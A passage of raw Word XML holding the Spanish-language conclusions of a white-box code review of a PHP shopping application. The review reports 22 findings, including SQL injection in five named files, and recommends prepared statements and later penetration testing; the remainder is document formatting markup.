        <w:t>Los resultados obtenidos evidencian debilidades estructurales en la construcción de consultas a la base de datos, en el manejo de sesiones y en la codificación de datos de entrada y salida. De los 22 hallazgos registrados, 8 corresponden a puntos independientes de inyección SQL repartidos en 5 archivos distintos (procesalogin.php, index.php, mostrar_carrito.php, carrito.php y grcomentarios.php), lo que confirma que la causa raíz —ausencia sistemática de consultas preparadas y de validación de tipos— debe abordarse a nivel de práctica de desarrollo y no únicamente corrigiendo cada ocurrencia puntual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6870BF13" w14:textId="49E95A32" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD069C8" w14:textId="1031DFAB" w:rsidR="43C70DCE" w:rsidRDefault="43C70DCE" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Es importante señalar que esta evaluación correspondió a un análisis de caja blanca (revisión manual de código fuente) ejecutado sobre un entorno local de desarrollo, sin explotación activa contra un sistema en producción. En consecuencia, los resultados no deben interpretarse como una validación integral de la seguridad del sistema desplegado, sino como un insumo técnico para priorizar la remediación y guiar futuras etapas de evaluación (por ejemplo, pruebas de penetración dinámicas sobre un entorno de staging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF2C33" w14:textId="673121DA" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02095F32" w14:textId="116FD122" w:rsidR="43C70DCE" w:rsidRDefault="43C70DCE" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>En función de lo anterior, se recomienda priorizar la remediación de los 9 hallazgos clasificados como CRÍTICA y de los 5 clasificados como ALTA antes de cualquier despliegue en producción, adoptar de forma transversal el uso de consultas preparadas y codificación de salida, e incorporar estas prácticas como parte del ciclo de desarrollo seguro del equipo, complementando esta revisión con pruebas de penetración dinámicas en etapas posteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D17EA2" w14:textId="37D76C5A" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78417910" w14:textId="77777777" w:rsidR="001F6BF4" w:rsidRDefault="001F6BF4"/>
    <w:sectPr w:rsidR="001F6B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924E47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777A72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A02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F10169"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D69CBD2C"/>
    <w:lvl w:ilvl="0" w:tplc="BBD20DDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6F44F2E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="534E68F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5EA40D46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="94D2DCBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7F52DD80">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0C86AB6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="34145FCE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DC1A8E3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1968853548">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1473208949">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1932935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427"/>
    <w:rsid w:val="00052B44"/>
    <w:rsid w:val="001F6BF4"/>
    <w:rsid w:val="002361E4"/>
    <w:rsid w:val="00245096"/>
    <w:rsid w:val="002D520B"/>
    <w:rsid w:val="003A1C80"/>
    <w:rsid w:val="004CB4A4"/>
    <w:rsid w:val="004F6929"/>
    <w:rsid w:val="00674591"/>
    <w:rsid w:val="007C3A00"/>
    <w:rsid w:val="008211E9"/>
    <w:rsid w:val="009E72ED"/>
    <w:rsid w:val="009F3A24"/>
    <w:rsid w:val="00AE37FA"/>
    <w:rsid w:val="00D21427"/>
    <w:rsid w:val="00EA15A6"/>
    <w:rsid w:val="172CEFCA"/>
    <w:rsid w:val="1B937862"/>
    <w:rsid w:val="2CD9EB9F"/>
    <w:rsid w:val="2EEBD3E9"/>
    <w:rsid w:val="36EAC658"/>
    <w:rsid w:val="3BF87DBC"/>
    <w:rsid w:val="41DF3A5A"/>
    <w:rsid w:val="43C70DCE"/>
    <w:rsid w:val="4699F921"/>
    <w:rsid w:val="480286E0"/>
    <w:rsid w:val="56D92AB5"/>
    <w:rsid w:val="5913CFAB"/>
    <w:rsid w:val="595C05F1"/>
    <w:rsid w:val="76531C83"/>
    <w:rsid w:val="76B424AF"/>
    <w:rsid w:val="7A0F65F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DDA1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CE3809C7-8450-4294-905A-1DEA5857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6BF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Textoindependiente"/>
    <w:link w:val="Ttulo2Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002D520B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="172CEFCA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>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D21427"/>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D21427"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D21427"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependiente">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextoindependienteCar"/>
    <w:qFormat/>
    <w:rsid w:val="002D520B"/>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2D520B"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo2Car">
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="002D520B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="Textoindependiente"/>
    <w:next w:val="Textoindependiente"/>
    <w:qFormat/>
    <w:rsid w:val="002D520B"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="Textoindependiente"/>
    <w:qFormat/>
    <w:rsid w:val="002D520B"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001F6BF4"/>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245096"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00245096"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="172CEF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13525">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="420294737">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1624573067">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="331956418">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="341392987">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1504585985">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="950624926">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1424185378">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="178393298">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1855806874">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1569336905">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1543055525">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="493181233">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="912932662">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1780640153">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1375352018">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="902103567">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="672104155">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="15154488">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2055960281">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="30425711">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="824126831">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1895457881">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1003361885">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="29644800">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="13674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928">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="770970748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1557625364">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2138836663">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="442310673">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1072698487">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
